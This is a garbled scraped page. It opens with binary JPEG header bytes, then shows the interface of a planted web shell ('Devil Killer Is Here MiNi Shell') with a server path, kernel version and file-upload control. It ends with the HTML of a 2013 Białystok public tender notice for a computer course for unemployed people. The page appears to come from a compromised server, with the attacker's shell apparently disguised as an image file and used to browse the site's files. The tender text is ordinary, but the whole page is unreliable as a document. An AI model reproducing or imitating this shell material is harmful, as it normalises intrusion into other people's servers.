JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130703/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130703/257348-N-2013.html

<p class="kh_header"><b>Białystok: Kurs komputerowy dla uczestników projektu systemowego Aktywność kluczem do sukcesu współfinansowanego przez Unię Europejską w ramach Europejskiego Funduszu Społecznego.</b><br>
<b>Numer ogłoszenia: 257348 - 2013; data zamieszczenia: 03.07.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Ośrodek Pomocy Rodzinie w Białymstoku , ul. Malmeda 8, 15-440 Białystok, woj. podlaskie, tel. 0-85 678 31 03, faks 0-85 678 31 00.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http:// www. mopr.bialystok.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Kurs komputerowy dla uczestników projektu systemowego Aktywność kluczem do sukcesu współfinansowanego przez Unię Europejską w ramach Europejskiego Funduszu Społecznego..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest zorganizowanie i przeprowadzenie kursu komputerowego dla 40 uczestników projektu systemowego Aktywność kluczem do sukcesu realizowanego przez Miejski Ośrodek Pomocy Rodzinie w Białymstoku, współfinansowanego przez Unię Europejską w ramach Europejskiego Funduszu Społecznego, Priorytet VII, Działanie 7.1, Poddziałanie 7.1.1 Rozwój i upowszechnianie aktywnej integracji przez ośrodki pomocy społecznej na lata 2007 - 2013.

2. Celem kursu jest uzyskanie wiedzy i zdobycie umiejętności dotyczących obsługi komputera.

3. Zakres przedmiotowy kursu na poziomie podstawowym:

Blok I - Podstawy technik informatycznych, użytkowanie komputerów,
Blok II - Przetwarzanie tekstów,
Blok III - Arkusze kalkulacyjne,
Blok IV - Grafika menadżerska i prezentacyjna,
Blok V - Usługi w sieciach informatycznych.

4.  Miejsce przeprowadzenia kursu:  teren miasta Białegostoku, jeden obiekt. 

5. Kurs powinien być prowadzony przez wykładowców posiadających odpowiednie kwalifikacje i doświadczenie w prowadzeniu zajęć objętych przedmiotem zamówienia.

6.  W ramach realizacji przedmiotu zamówienia Wykonawca zobowiązany będzie do:    
a) zorganizowania i przeprowadzenia kursu komputerowego na poziomie podstawowym, w terminie do dnia 28.08.2013r., dla 40 osób bezrobotnych, w tym długotrwale bezrobotnych, nieaktywnych zawodowo, podzielonych na 2 grupy 20- osobowe, z uwzględnieniem 70 godzin lekcyjnych zajęć dla każdej z grup ( 1 godzina lekcyjna = 45 minut), przez 11 dni po 6 godzin lekcyjnych oraz 1 dzień przez 4 godziny lekcyjne, w dni robocze od poniedziałku do piątku, od godz. od 9:00 , minimum dwa razy w tygodniu,
b) organizacji kursu tzn. zapewnienia bezpiecznych i higienicznych warunków nauki, w tym zapewnienia sal szkoleniowych, przestronnych, odpowiednio oświetlonych, klimatyzowanych lub  minimum wentylowanych, dostosowanych do prowadzenia zajęć dla grup 20-osobowych, odpowiednio wyposażonych w sprzęt dydaktyczny, np. rzutnik multimedialny, laptop, ekran, tablicę do pisania, flipcharty, stoły, krzesła, spełniających wymogi bezpieczeństwa bhp i przeciwpożarowe,  z zapleczem socjalnym i sanitarnym, oraz zapewnienia w czasie zajęć każdemu uczestnikowi kursu samodzielnego dostępu do komputera z oprogramowaniem niezbędnym do przeprowadzenia szkolenia wraz z dostępem do Internetu, w stanie technicznym zapewniającym odpowiedni poziom kursu,

c) zapewnienia wyżywienia uczestnikom kursu, w miejscu jego przeprowadzania, tj.:
- w każdym dniu szkolenia trwającym 6 godzin lekcyjnych: obiadu złożonego z dwóch dań + napój oraz kawy, herbaty, ciastek, wody gazowanej i niegazowanej, cukru, mleka, podczas zaplanowanej jednej przerwy kawowej,
- w dniu szkolenia trwającym poniżej 6 godzin lekcyjnych: obiadu złożonego z dwóch dań + napój,

d) zapewnienie uczestnikom kursu biletów komunikacji miejskiej upoważniających do korzystania ze zbiorowej komunikacji miejskiej na terenie miasta Białegostoku, na przejazd z miejsca zamieszkania do miejsca odbywania się kursu i z powrotem,

e) zapewnienia materiałów szkoleniowych odpowiadających programowi kursu oraz przekazania po jednym egzemplarzu w/w materiałów szkoleniowych  na własność uczestnikom kursu oraz Zamawiającemu,

f) zapewnienia nadzoru nad organizacją kursu i realizacją programu merytorycznego, celem podniesienia jakości organizowanego kursu komputerowego, 

g) opracowania szczegółowego programu zajęć kursu , uwzględniającego założenia pkt. 3 SIWZ i dostarczenie Zamawiającemu wraz ze złożoną ofertą,

h) ustalenia, po konsultacjach z Zamawiającym, harmonogramu zajęć, uwzględniającego m.in. dni zajęć, dzienny limit godzin szkolenia, tematy zajęć, miejsce odbywania zajęć, dane personalne wykładowcy i przekazania go Zamawiającemu  przed rozpoczęciem zajęć. Wykonawca przed rozpoczęciem kursu zapozna uczestników z jego szczegółowym zakresem tematycznym  i przekaże im harmonogram realizowanych zajęć,

i) przeprowadzenia ankiety oceniającej kurs wśród jego uczestników w ostatnim dniu trwania zajęć  i sporządzenia raportu zbiorczego,

j) przeprowadzenia egzaminu wewnętrznego w ostatnim dniu kursu,

7. Wykonawca zobowiązany będzie do oznaczania pomieszczeń, w których realizowany będzie projekt, materiałów szkoleniowych i innej dokumentacji zgodnie z Wytycznymi dotyczącymi oznaczania projektów w ramach Programu Operacyjnego Kapitał Ludzki zamieszczanymi na stronie internetowej: www.efs.gov.pl lub www.mrr.gov.pl lub www.funduszeeuropejskie.gov.pl. Budynek i sale szkoleniowe muszą być oznakowane informacją o nazwie kursu, czasie trwania, numerze sali, w której będą odbywać się zajęcia i nazwie projektu zgodnie z wytycznymi.

8.  Wykonawca zobowiązany będzie do prowadzenia dokumentacji potwierdzającej realizację usługi, zgodnie z wymogami UE oraz dokumentacją PO KL, w szczególności:

a) prowadzenia dziennej listy obecności uczestników kursu (potwierdzanie obecności za pomocą własnoręcznego czytelnego podpisu), a także rejestrowania i niezwłocznego zgłaszania Zamawiającemu najpóźniej w następnym dniu wszystkich nieobecności uczestników kursu, pod rygorem odmowy zapłaty za szkolenie tych osób,

b) odebrania od uczestników oświadczeń potwierdzających odbiór materiałów szkoleniowych oraz oświadczeń potwierdzających  skorzystanie z codziennego wyżywienia (obiad, poczęstunek w trakcie przerwy kawowej) oraz biletów komunikacji miejskiej,
                   
c) prowadzenia dziennika zajęć, według wzoru określonego przez Zamawiającego, zawierającego wymiar godzin i tematy zajęć, podpis wykładowcy,

d) prowadzenia rejestru wydanych zaświadczeń o ukończeniu kursu, 

e) wydania uczestnikom zaświadczeń potwierdzających ukończenie kursu, zawierających w swojej treści minimum niżej wymienione elementy:
- pieczęć organizatora kursu,
- personalne dane osoby, która kurs  ukończyła (imię, nazwisko, data i miejsce  urodzenia),
- nazwę formy kształcenia,
- nazwę organizatora kursu,
- termin realizacji kursu,
- cel kursu,
- miejscowość i datę wydania zaświadczenia o ukończeniu kursu,
- podpis i pieczęć osoby upoważnionej przez organizatora kursu do wydania zaświadczenia o ukończeniu kursu,
- nazwę zajęć edukacyjnych oraz wymiar ich godzin,
oznakowanych kolorowymi logotypami: Programu Operacyjnego Kapitał Ludzki, Unii Europejskiej, Europejskiego Funduszu Społecznego zgodnie z Wytycznymi dotyczącymi oznaczania projektów w ramach Programu Operacyjnego Kapitał Ludzki zamieszczanymi na stronie internetowej: www.efs.gov.pl lub www.mrr.gov.pl lub www.funduszeeuropejskie.gov.pl. Kopie zaświadczeń Wykonawca jest zobowiązany przekazać Zamawiającemu w terminie 3 dni od ukończenia kursu.

9. W ramach przedmiotu zamówienia Wykonawca zobowiązany będzie do grupowego ubezpieczenia uczestników kursu  (wymagana suma ubezpieczenia na jednego uczestnika: 10 000,00 zł) na czas trwania zajęć oraz w drodze na kurs i z powrotem, od następstw nieszczęśliwych wypadków powstałych w związku z uczestnictwem w kursie. Przed rozpoczęciem kursu  Wykonawca przekaże Zamawiającemu potwierdzoną za zgodność z oryginałem kserokopię polisy ubezpieczeniowej. Skutki niedopełnienia obowiązku ubezpieczenia ponosi Wykonawca. Koszt ubezpieczenia stanowi element ceny kursu.

10. Zamawiający zastrzega sobie możliwość zmniejszenia ilości uczestników kursu,  w ilości nieprzekraczającej 20% liczby uczestników z prawem proporcjonalnego zmniejszenia ceny.

11.  Dodatkowe warunki dotyczące przedmiotu zamówienia:
a) termin płatności:  do 21 dni od daty otrzymania przez Zamawiającego faktury,

b) nie przewiduje się wypłacania zaliczek na poczet wykonania zamówienia,

c) forma i warunki zapłaty - jak we wzorze umowy - załącznik nr 8 do specyfikacji istotnych warunków   zamówienia,

d) Wykonawca wskaże w ofercie (oświadczenie na formularzu oferty) część zamówienia, której wykonanie zamierza powierzyć podwykonawcom. W przypadku nie wskazania części zamówienia, która ma być realizowana przez podwykonawcę Zamawiający uzna, że całość zamówienia będzie wykonywana przez Wykonawcę osobiście..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>1. Zamawiający przewiduje możliwość udzielania zamówień uzupełniających, o których mowa w art. 67 ust. 1 pkt 6 ustawy.
2. Zamówienia uzupełniające mogą polegać na powtórzeniu tego samego rodzaju zamówienia lub jego części, zgodnego z przedmiotem zamówienia podstawowego, o wartości do 10%  zamówienia podstawowego w okresie 3 lat od udzielenia zamówienia podstawowego (od dnia podpisania umowy).</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.53.32.00-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 28.08.2013.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od opisu sposobu dokonywania oceny spełniania warunku w tym zakresie. Zamawiający dokona oceny spełnienia warunku na podstawie oświadczenia wykonawcy o spełnianiu warunków udziału w postępowaniu, o którym mowa w pkt 9.1. lit. a SIWZ.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeżeli Wykonawca wykaże, że w ciągu ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy, w tym okresie, wykonał (w przypadku świadczeń okresowych lub ciągłych uwzględniane są również nadal wykonywane) co najmniej 2 usługi szkoleniowe polegające na zorganizowaniu i przeprowadzeniu kursów komputerowych o wartości nie mniejszej niż 20 000,00 zł brutto każda oraz załączy dowody potwierdzające, że te usługi zostały wykonane lub są wykonywane należycie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeżeli Wykonawca wykaże, że dysponuje minimum 40 zestawami komputerowymi z oprogramowaniem niezbędnym do przeprowadzenia szkolenia wraz z dostępem do Internetu.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeżeli Wykonawca wykaże, że:
- dysponuje minimum 2 osobami,  z których każda posiada kwalifikacje i wykształcenie uprawniające do prowadzenia kursu komputerowego, tj. posiadają wykształcenie  wyższe informatyczne lub ukończyły studia podyplomowe z zakresu  informatyki oraz posiadają doświadczenie w prowadzeniu zajęć w zakresie objętym przedmiotem zamówienia, tj. przeprowadziły w okresie ostatnich 3 lat przed upływem terminu składania ofert co najmniej trzy kursy komputerowe.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od opisu sposobu dokonywania oceny spełniania warunku w tym zakresie. Zamawiający dokona oceny spełnienia warunku na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu, o którym mowa w pkt 9.1. lit. a SIWZ.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">a) szczegółowy programu zajęć kursu komputerowego,
b) informację dotyczącą lokalizacji, w której realizowany będzie kurs komputerowy, zawierającą minimum: miejsce (adres) realizacji kursu, opis warunków lokalowych, tj. wielkość sal szkoleniowych oraz ich charakterystyka), opis innych pomieszczeń z których rzeczywiście będą korzystać uczestnicy kursu.</p></li>



</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Zamawiający wymaga także dołączenia do oferty:
a) wypełnionego i podpisanego Formularza oferty z wykorzystaniem wzoru stanowiącego załącznik nr 1 do specyfikacji istotnych warunków zamówienia,  
b) pełnomocnictwa podmiotów występujących wspólnie (np. konsorcjum, spółka cywilna),
c) w przypadku gdy Wykonawcę reprezentuje pełnomocnik, do oferty należy dołączyć pełnomocnictwo, z którego wynika zakres umocowania, podpisane przez osoby uprawnione do reprezentowania Wykonawcy.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza możliwość dokonania zmiany warunków zawartej umowy w stosunku do treści oferty, na podstawie której wybrano Wykonawcę, polegającą na:

a) zmianie terminu realizacji przedmiotu umowy w przypadku:
- jeżeli jego niedotrzymanie wynika z działania siły wyższej, 
- wystąpienia okoliczności niezależnych od Wykonawcy przy zachowaniu przez niego należytej staranności, skutkujących niemożnością dotrzymania terminu realizacji przedmiotu umowy, 
- niemożliwości realizacji przedmiotu umowy w zakładanym terminie z przyczyn organizacyjnych leżących po stronie Zamawiającego,

b) zmianie w zakresie przedmiotu umowy:
- jeżeli nastąpi zmiana powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację przedmiotu zamówienia,
- w związku z koniecznością wprowadzenia zmian będących następstwem zmian wprowadzonych w umowach pomiędzy Zamawiającym, a innym niż Wykonawca stroną, w tym instytucjami nadzorującymi realizację projektu, w ramach którego realizowana jest niniejsza umowa, 
- w związku z koniecznością wprowadzenia zmian będących następstwem zmian wytycznych dotyczących Programu Operacyjnego Kapitał Ludzki lub wytycznych i zaleceń Instytucji Zarządzającej lub Instytucji Pośredniczącej,
 - zmianie w zakresie przedmiotu umowy w związku ze zmniejszeniem liczby uczestników kursu oraz w przypadku wystąpienia zdarzeń losowych dotyczących tych uczestników, bez konieczności zachowania formy pisemnej,

c) zmianie harmonogramu zajęć w przypadku:
- wystąpienia obiektywnych okoliczności skutkujących koniecznością dokonania zmiany z przyczyn niezależnych od stron umowy, bez zmiany terminu realizacji umowy,
- zmiany umowy w zakresie terminu realizacji przedmiotu umowy,

d) zmianie osób, które będą uczestniczyć w realizacji zamówienia pod warunkiem, że zmiana ta jest konieczna z przyczyn niezależnych od Wykonawcy oraz że osoba, nie wykazana w ofercie, a wskazana przez Wykonawcę  do realizacji zamówienia, będzie posiadała kwalifikacje i doświadczenie odpowiadające wymaganiom Zamawiającego określonym w specyfikacji istotnych warunków zamówienia - po pisemnym zawiadomieniu Zamawiającego i uzyskaniu zgody Zamawiającego, bez konieczności zachowania pisemnej formy zmiany umowy,

e) zmianie miejsca przeprowadzenia kursu, pod warunkiem że zmiana jest konieczna z przyczyn niezależnych od Wykonawcy i nie ulegnie zmianie miejscowość przeprowadzenia kursu, a  warunki lokalowe zaproponowane przez Wykonawcę będą porównywalne z warunkami wskazanymi w ofercie,

f) zmianie wynagrodzenia w przypadku:
- ustawowej zmiany stawki podatku od towarów i usług (VAT) na dany rodzaj usługi o kwotę powstałą w wyniku zmiany stawki podatku VAT. Jeżeli w okresie obowiązywania umowy nastąpi zmiana stawki podatku od towarów i usług (VAT), od chwili zmiany podatek w nowej stawce będzie doliczany do dotychczasowych cen netto, bez konieczności zmiany umowy,
- w zmniejszenia ilości uczestników kursu, o których mowa w § 1 ust. 1 umowy - wówczas zmiana wynagrodzenia będzie obliczona w oparciu o ceny jednostkowe wymienione w ofercie Wykonawcy, będącej załącznikiem do umowy,  z uwzględnieniem ilości osób rzeczywiście uczestniczących w kursie, bez konieczności zachowania pisemnej formy zmiany umowy,

g) zmianie umowy wynikającej z innej, niemożliwej do przewidzenia w momencie zawarcia umowy, okoliczności prawnej, ekonomicznej lub technicznej, za którą żadna ze stron nie ponosi 
odpowiedzialności, skutkującą brakiem możliwości należytego wykonania umowy lub zmiana ta jest korzystna dla Zamawiającego.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http:// www. mopr.bialystok.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejski Ośrodek Pomocy Rodzinie w Białymstoku, ul. Malmeda 8, 15-440 Białystok, ul. Malmeda 8, woj. podlaskie..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 11.07.2013 godzina 09:45, miejsce: siedziba Zamawiającego: Miejski Ośrodek Pomocy Rodzinie w Białymstoku, ul. Malmeda 8, 15-440 Białystok, sekretariat..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




